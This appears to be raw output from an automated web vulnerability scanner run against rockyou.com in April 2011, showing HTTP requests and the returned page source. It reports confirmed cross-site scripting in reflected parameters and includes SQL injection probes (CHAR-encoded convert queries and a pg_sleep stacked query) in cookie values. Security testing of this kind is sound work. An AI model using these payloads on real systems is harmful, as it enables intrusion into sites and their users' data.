playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=br&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025F3)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid..
Date: Mon, 18 Apr 2011 22:58:24 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:58:23 GMT; path=/; domain=.rockyou.com,lastlogin=1303167504; expires=Wed, 27-Jul-2011 22:58:24 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:58:24 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=24143 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26966
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = ''"--></style></script><script>netsparker(0x0025F3)</script>';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=br&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025F3)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid..
|
- /viewsearch.php
/viewsearch.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| s_tsearch | GET | ' stYle=x:expre/**/ssion(alert(9)) ns=' |
Request
GET /viewsearch.php?s_tsearch='%20stYle=x:expre/**/ssion(netsparker(9))%20ns=' HTTP/1.1
Referer: http://www.rockyou.com/viewsearch.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167560; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/viewsearch.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167560; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:59:31 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:59:30 GMT; path=/; domain=.rockyou.com,lastlogin=1303167571; expires=Wed, 27-Jul-2011 22:59:31 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:59:31 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=18017 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5469
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
